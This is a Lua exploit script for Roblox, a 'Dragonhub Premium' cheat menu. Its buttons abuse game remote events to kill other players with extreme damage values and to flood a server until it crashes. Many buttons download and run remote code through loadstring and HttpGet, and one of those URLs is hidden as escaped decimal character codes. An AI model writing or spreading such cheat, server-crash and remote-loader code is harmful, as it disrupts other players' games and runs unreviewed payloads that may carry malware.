-- init
local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/GreenDeno/Venyx-UI-Library/main/source.lua"))()
local dragonhubpremium = library.new("Dragonhub Premium", 5013109572)

-- themes
local themes = {
	Background = Color3.fromRGB(24, 24, 24),
	Glow = Color3.fromRGB(0, 0, 0),
	Accent = Color3.fromRGB(10, 10, 10),
	LightContrast = Color3.fromRGB(20, 20, 20),
	DarkContrast = Color3.fromRGB(14, 14, 14),  
	TextColor = Color3.fromRGB(255, 255, 255)
}

-- first page
local page = dragonhubpremium:addPage("SS", 5012544693)
local section1 = page:addSection("Section 1")
local section2 = page:addSection("Section 2")

section1:addToggle("Extended-Kill", nil, function(value)
	print("Toggled", value)
end)
section1:addButton("Dragon-Commands", function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/IVJAYx/youtubethumnailhttp/main/htttp'))()
    end)

-------- SECTION 2 ----------
section2:addKeybind("Toggle Keybind", Enum.KeyCode.Z, function()
	print("Activated Keybind")
	dragonhubpremium:toggle()
end, function()
	print("Changed Keybind")
end)
section2:addColorPicker("ColorPicker", Color3.fromRGB(50, 50, 50))
section2:addColorPicker("ColorPicker2")
section2:addSlider("Slider", 0, -100, 100, function(value)
	print("Dragged", value)
end)
section2:addButton("Starr", function()
	
end)

section2:addButton("Sword-Target", function()
end)
-- second page
local theme = dragonhubpremium:addPage("Theme", 5012544693)
local colors = theme:addSection("Colors")

for theme, color in pairs(themes) do -- all in one theme changer, i know, im cool
	colors:addColorPicker(theme, color, function(color3)
		dragonhubpremium:setTheme(theme, color3)
	end)
end

-- load
dragonhubpremium:SelectPage(dragonhubpremium.pages[1], true)

section1:addButton("GodSword", function()
	for ix, vx in pairs(game.Players.LocalPlayer.Character:GetChildren()) do
		if vx:IsA("Tool") then
			vx.Parent = game.Players.LocalPlayer.Backpack
		end
	end
	for i, v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
		local function LRTJH_fake_script()
			local script = Instance.new('Script', v.Handle)
	
			function onTouched(part)
				local h = part.Parent:findFirstChild("Humanoid")
				if h~=nil then
					if tostring(h.Parent) ~= tostring(game.Players.LocalPlayer) then
						local v1 = h
						local v2 = -1e+400
						local event = game:GetService("Players").LocalPlayer.Character.sword.Handle.dmg.RemoteEvent
	
						event:FireServer(v1, v2)
					end
				end
			end
	
			script.Parent.Touched:connect(onTouched)
		end
		coroutine.wrap(LRTJH_fake_script)()
	end
end)

section1:addButton("God", function()
	while wait(0) do
		local v1 = game.Players.LocalPlayer.Character.Humanoid
		local v2 = -1e+300
		local event = game:GetService("Players").LocalPlayer.Character.sword.Handle.dmg.RemoteEvent
	
		event:FireServer(v1, v2)
	end
end)


section2:addButton("Info", function()
	local CoreGui = game:GetService("StarterGui") -- Variable of StarterGui
CoreGui:SetCore("SendNotification", {
    -- Customizable
    Title = "OWNERS",
    Text = "Credits to TruIy#0007 X Alzn#0409 X j_allday X Svvrnz#2942",
    Duration = 10, -- Set the duration to how much you want this to stay
    -- More code in part 2
})
end)

section1:addButton("Sword Beam", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/IVJAYx/SOMETHINGMOREPART2/main/PART2'))()
end)
--
section1:addButton("Sword Beam2", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/IVJAYx/SOMETHING/main/SOMETHINGMORE'))()
end)

section1:addButton("xHub", function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/SvunF/XHub/main/XHUBB'))()
end)

section1:addButton("IvHub", function()
	loadstring(game:HttpGet('\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\79\109\110\105\112\111\116\101\110\99\101\68\101\118\101\108\111\112\101\114\47\78\117\109\98\101\114\47\109\97\105\110\47\49\46\108\117\97'))()
end)

------ MESSAGE-----

local A_1 = game.Players.LocalPlayer.name.." [Executed Dragon Hub Premium.]"-----message here
    local A_2 = "All"
    local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest
    Event:FireServer(A_1, A_2)



	--------- NOTFICATION ---------

local CoreGui = game:GetService("StarterGui") -- Variable of StarterGui
CoreGui:SetCore("SendNotification", {
    -- Customizable
    Title = "OWNERS",
    Text = "Credits to TruIy#0007 X Svvrnz#2942.",
    Duration = 10, -- Set the duration to how much you want this to stay
    -- More code in part 2
})

local s = Instance.new("Sound", workspace)
 s.Volume  = 1
 s.SoundId = "rbxassetid://195868961"
 s.Looped  = false
 s:Play()
wait(3)
local s = Instance.new("Sound", workspace)
 s.Volume  = 1
 s.SoundId = "rbxassetid://2846842890"
 s.Looped  = true
 s:Play()

local page = dragonhubpremium:addPage("PowerView", 5012544693)
local section1 = page:addSection("Section 3")
local section2 = page:addSection("Section 4")
section1:addButton("Power", function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/IVJAYx/VIEW/main/hi'))()
end)

section2:addButton("2take1", function()
	loadstring(game:HttpGet('http://2take1.tk'))() 
end)

section1:addButton("Dragon-ServerCrasher", function()
	local e = 0
	for i = 1, 44100 do
		local v1 = 'Black'
		local event = game:GetService("Workspace").eff.RemoteEvent
		event:FireServer(v1)
	end
	wait(0.1)
	--create sword
	local event = game:GetService("Workspace").load.RemoteEvent
	event:FireServer()
end)

local page = dragonhubpremium:addPage("Other-Scripts", 5012544693)
local section1 = page:addSection("Section 1")
local section2 = page:addSection("Section 2")
local section3 = page:addSection("Section 3")
local section4= page:addSection("Section 4")
section1:addButton("XGodGiver", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/IVJAYx/x/main/neg'))()
end)

section4:addButton("Phantom", function()

end)
section2:addButton("Yuri", function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/IVJAYx/urlcode/main/url'))()
end)
section3:addButton("GodGiver", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/IVJAYx/GG/main/UI'))()
end)

local page = dragonhubpremium:addPage("IXDREAD", 5012544693)
local section1 = page:addSection("Section X")
section1:addButton("Discord", function()
    setclipboard("https://discord.gg/bN4p3gRQZF")
    toclipboard("https://discord.gg/bN4p3gRQZF")
end)
----------------------
local lib = loadstring(game:HttpGet(("https://raw.githubusercontent.com/AbstractPoo/Main/main/Notifications.lua"),true))()

local function notif(plr)
   local message
   if plr.Name ~= plr.DisplayName then
       message = plr.Name .. " (" .. plr.DisplayName .. ") has joined"
   else
       message = plr.Name .. " has joined"
   end
   lib:notify{
       Title = "New Player Connected",
       Description = message,
       Length = 4
   }
end

game:GetService("Players").PlayerAdded:Connect(notif)

--
game.Players.Diglet2011:Kick("You're Blacklisted in IXDREAD if this was a mistake please dm any Administrators Or the Owner of this Script.")

local Players = game:GetService("Players")

Players.PlayerAdded:Connect(function(Player)
	task.wait(1)
	print(1)
	task.wait(2)
	print(2)
	task.wait(3)
	print(3)
	syukfi:Kick("You're Blacklisted in IXDREAD if this was a mistake please dm any Administrators Or the Owner of this Script.")
end)
